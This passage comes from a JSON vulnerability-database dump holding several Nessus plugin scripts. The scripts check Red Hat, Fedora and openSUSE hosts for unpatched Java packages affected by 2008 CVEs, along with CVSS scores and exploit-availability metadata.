script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(94, 119, 189, 200, 264);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.5.0-ibm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.5.0-ibm-accessibility\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.5.0-ibm-demo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.5.0-ibm-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.5.0-ibm-javacomm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.5.0-ibm-jdbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.5.0-ibm-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.5.0-ibm-src\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4.7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5.2\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2008/12/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/01/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/08/24\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(4|5)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 4.x / 5.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2009:0016\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL4\", reference:\"java-1.5.0-ibm-1.5.0.9-1jpp.4.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", reference:\"java-1.5.0-ibm-demo-1.5.0.9-1jpp.4.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", reference:\"java-1.5.0-ibm-devel-1.5.0.9-1jpp.4.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"i386\", reference:\"java-1.5.0-ibm-javacomm-1.5.0.9-1jpp.4.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"x86_64\", reference:\"java-1.5.0-ibm-javacomm-1.5.0.9-1jpp.4.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"i386\", reference:\"java-1.5.0-ibm-jdbc-1.5.0.9-1jpp.4.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"s390\", reference:\"java-1.5.0-ibm-jdbc-1.5.0.9-1jpp.4.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"i386\", reference:\"java-1.5.0-ibm-plugin-1.5.0.9-1jpp.4.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", reference:\"java-1.5.0-ibm-src-1.5.0.9-1jpp.4.el4\")) flag++;\n\n\n if (rpm_check(release:\"RHEL5\", reference:\"java-1.5.0-ibm-1.5.0.9-1jpp.2.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"java-1.5.0-ibm-accessibility-1.5.0.9-1jpp.2.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"java-1.5.0-ibm-accessibility-1.5.0.9-1jpp.2.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"java-1.5.0-ibm-accessibility-1.5.0.9-1jpp.2.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", reference:\"java-1.5.0-ibm-demo-1.5.0.9-1jpp.2.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", reference:\"java-1.5.0-ibm-devel-1.5.0.9-1jpp.2.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"java-1.5.0-ibm-javacomm-1.5.0.9-1jpp.2.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"java-1.5.0-ibm-javacomm-1.5.0.9-1jpp.2.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"java-1.5.0-ibm-jdbc-1.5.0.9-1jpp.2.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390\", reference:\"java-1.5.0-ibm-jdbc-1.5.0.9-1jpp.2.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"java-1.5.0-ibm-plugin-1.5.0.9-1jpp.2.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", reference:\"java-1.5.0-ibm-src-1.5.0.9-1jpp.2.el5\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"java-1.5.0-ibm / java-1.5.0-ibm-accessibility / java-1.5.0-ibm-demo / etc\");\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-01T01:26:11", "bulletinFamily": "scanner", "description": "OpenJDK security patches applied.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2020-06-02T00:00:00", "id": "FEDORA_2008-10913.NASL", "href": "https://www.tenable.com/plugins/nessus/37147", "published": "2009-04-23T00:00:00", "title": "Fedora 10 : java-1.6.0-openjdk-1.6.0.0-7.b12.fc10 (2008-10913)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2008-10913.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(37147);\n script_version (\"1.17\");\n script_cvs_date(\"Date: 2019/08/02 13:32:26\");\n\n script_cve_id(\"CVE-2008-5347\", \"CVE-2008-5348\", \"CVE-2008-5349\", \"CVE-2008-5350\", \"CVE-2008-5351\", \"CVE-2008-5352\", \"CVE-2008-5353\", \"CVE-2008-5354\", \"CVE-2008-5356\", \"CVE-2008-5357\", \"CVE-2008-5358\", \"CVE-2008-5359\", \"CVE-2008-5360\");\n script_xref(name:\"FEDORA\", value:\"2008-10913\");\n\n script_name(english:\"Fedora 10 : java-1.6.0-openjdk-1.6.0.0-7.b12.fc10 (2008-10913)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"OpenJDK security patches applied.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=472201\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=472206\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=472208\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=472209\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=472211\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=472212\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=472213\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=472218\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=472224\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=472228\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=472231\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=472233\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=472234\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2008-December/017354.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?f8359641\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected java-1.6.0-openjdk package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Sun Java Calendar Deserialization Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(119, 189, 200, 264);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:java-1.6.0-openjdk\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:10\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/12/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/04/23\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2019 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^10([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 10.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC10\", reference:\"java-1.6.0-openjdk-1.6.0.0-7.b12.fc10\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"java-1.6.0-openjdk\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-01T04:20:43", "bulletinFamily": "scanner", "description": "OpenJDK Java 1.6.0 was upgraded to build b14, fixing quite a lot of\nsecurity issues.\n\nIt fixes at least: 4486841 UTF8 decoder should adhere to corrigendum\nto Unicode 3.0.1 CVE-2008-5351 6484091 FileSystemView leaks directory\ninfo CVE-2008-5350 aka SUN SOLVE 246266 6497740 Limit the size of RSA\npublic keys CVE-2008-5349 6588160 jaas krb5 client leaks OS-level UDP\nsockets (all platforms) CVE-2008-5348 6592792 Add com.sun.xml.internal\nto the ", "modified": "2020-06-02T00:00:00", "id": "SUSE_11_1_JAVA-1_6_0-OPENJDK-090303.NASL", "href": "https://www.tenable.com/plugins/nessus/40238", "published": "2009-07-21T00:00:00", "title": "openSUSE Security Update : java-1_6_0-openjdk (java-1_6_0-openjdk-578)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update java-1_6_0-openjdk-578.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(40238);\n script_version(\"1.14\");\n script_cvs_date(\"Date: 2019/10/25 13:36:34\");\n\n script_cve_id(\"CVE-2008-5347\", \"CVE-2008-5348\", \"CVE-2008-5349\", \"CVE-2008-5350\", \"CVE-2008-5351\", \"CVE-2008-5352\", \"CVE-2008-5353\", \"CVE-2008-5354\", \"CVE-2008-5356\", \"CVE-2008-5357\", \"CVE-2008-5358\", \"CVE-2008-5359\", \"CVE-2008-5360\");\n\n script_name(english:\"openSUSE Security Update : java-1_6_0-openjdk (java-1_6_0-openjdk-578)\");\n script_summary(english:\"Check for the java-1_6_0-openjdk-578 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"OpenJDK Java 1.6.0 was upgraded to build b14, fixing quite a lot of\nsecurity issues.\n\nIt fixes at least: 4486841 UTF8 decoder should adhere to corrigendum\nto Unicode 3.0.1 CVE-2008-5351 6484091 FileSystemView leaks directory\ninfo CVE-2008-5350 aka SUN SOLVE 246266 6497740 Limit the size of RSA\npublic keys CVE-2008-5349 6588160 jaas krb5 client leaks OS-level UDP\nsockets (all platforms) CVE-2008-5348 6592792 Add com.sun.xml.internal\nto the 'package.access' property in\n$JAVA_HOME/lib/security/java.security CVE-2008-5347 aka SUN SOLVE\n246366 6721753 File.createTempFile produces guessable file names\nCVE-2008-5360 6726779 ConvolveOp on USHORT raster can cause the JVM\ncrash. CVE-2008-5359 aka SUN SOLVE 244987 6733336 Crash on malformed\nfont CVE-2008-5356 aka SUN SOLVE 244987 6733959 Insufficient checks\nfor 'Main-Class' manifest entry in JAR files CVE-2008-5354 aka SUN\nSOLVE 244990 6734167 Calendar.readObject allows elevation of\nprivileges CVE-2008-5353 6751322 Vulnerability report: Sun Java JRE\nTrueType Font Parsing Heap Overflow CVE-2008-5357 aka SUN SOLVE 244987\n6755943 Java JAR Pack200 Decompression should enforce stricter header\nchecks CVE-2008-5352 aka SUN SOLVE 244992 6766136 corrupted gif image\nmay cause crash in java splashscreen library. CVE-2008-5358 aka SUN\nSOLVE 244987\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=471829\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected java-1_6_0-openjdk packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Sun Java Calendar Deserialization Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(119, 189, 200, 264);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_6_0-openjdk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_6_0-openjdk-demo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_6_0-openjdk-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_6_0-openjdk-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_6_0-openjdk-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_6_0-openjdk-src\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/03/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/07/21\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2019 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.1\", reference:\"java-1_6_0-openjdk-1.4_b14-24.2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"java-1_6_0-openjdk-demo-1.4_b14-24.2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"java-1_6_0-openjdk-devel-1.4_b14-24.2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"java-1_6_0-openjdk-javadoc-1.4_b14-24.2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"java-1_6_0-openjdk-plugin-1.4_b14-24.2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"java-1_6_0-openjdk-src-1.4_b14-24.2.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"java-1_6_0-openjdk\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-01T04:20:34", "bulletinFamily": "scanner", "description": "The version update to SUN Java 1.6.0_11-b03 fixes numerous security\nissues such as privilege escalations. (CVE-2008-5360, CVE-2008-5359,\nCVE-2008-5358, CVE-2008-5357, CVE-2008-5356, CVE-2008-5344,\nCVE-2008-5343, CVE-2008-5342, CVE-2008-5341, CVE-2008-5340,\nCVE-2008-5339, CVE-2008-2086, CVE-2008-5355, CVE-2008-5354,\nCVE-2008-5353, CVE-2008-5352, CVE-2008-5351, CVE-2008-5350,\nCVE-2008-5349, CVE-2008-5348, CVE-2008-5347, CVE-2008-5345,\nCVE-2008-5346)", "modified": "2020-06-02T00:00:00", "id": "SUSE_11_0_JAVA-1_6_0-SUN-081217.NASL", "href": "https://www.tenable.com/plugins/nessus/40002", "published": "2009-07-21T00:00:00", "title": "openSUSE Security Update : java-1_6_0-sun (java-1_6_0-sun-376)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update java-1_6_0-sun-376.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(40002);\n script_version(\"1.15\");\n script_cvs_date(\"Date: 2019/10/25 13:36:31\");\n\n script_cve_id(\"CVE-2008-2086\", \"CVE-2008-5339\", \"CVE-2008-5340\", \"CVE-2008-5341\", \"CVE-2008-5342\", \"CVE-2008-5343\", \"CVE-2008-5344\", \"CVE-2008-5345\", \"CVE-2008-5346\", \"CVE-2008-5347\", \"CVE-2008-5348\", \"CVE-2008-5349\", \"CVE-2008-5350\", \"CVE-2008-5351\", \"CVE-2008-5352\", \"CVE-2008-5353\", \"CVE-2008-5354\", \"CVE-2008-5355\", \"CVE-2008-5356\", \"CVE-2008-5357\", \"CVE-2008-5358\", \"CVE-2008-5359\", \"CVE-2008-5360\");\n\n script_name(english:\"openSUSE Security Update : java-1_6_0-sun (java-1_6_0-sun-376)\");\n script_summary(english:\"Check for the java-1_6_0-sun-376 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The version update to SUN Java 1.6.0_11-b03 fixes numerous security\nissues such as privilege escalations. (CVE-2008-5360, CVE-2008-5359,\nCVE-2008-5358, CVE-2008-5357, CVE-2008-5356, CVE-2008-5344,\nCVE-2008-5343, CVE-2008-5342, CVE-2008-5341, CVE-2008-5340,\nCVE-2008-5339, CVE-2008-2086, CVE-2008-5355, CVE-2008-5354,\nCVE-2008-5353, CVE-2008-5352, CVE-2008-5351, CVE-2008-5350,\nCVE-2008-5349, CVE-2008-5348, CVE-2008-5347, CVE-2008-5345,\nCVE-2008-5346)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=456770\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected java-1_6_0-sun packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Sun Java Calendar Deserialization Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(94, 119, 189, 200, 264, 287);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_6_0-sun\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_6_0-sun-alsa\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_6_0-sun-demo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_6_0-sun-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_6_0-sun-jdbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_6_0-sun-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/12/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/07/21\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2019 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.0)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.0\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.0\", reference:\"java-1_6_0-sun-1.6.0.u11-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"java-1_6_0-sun-alsa-1.6.0.u11-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"java-1_6_0-sun-demo-1.6.0.u11-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"java-1_6_0-sun-devel-1.6.0.u11-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"java-1_6_0-sun-jdbc-1.6.0.u11-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"java-1_6_0-sun-plugin-1.6.0.u11-0.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"java-1_6_0-sun / java-1_6_0-sun-alsa / java-1_6_0-sun-demo / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-01T03:47:51", "bulletinFamily": "scanner", "description": 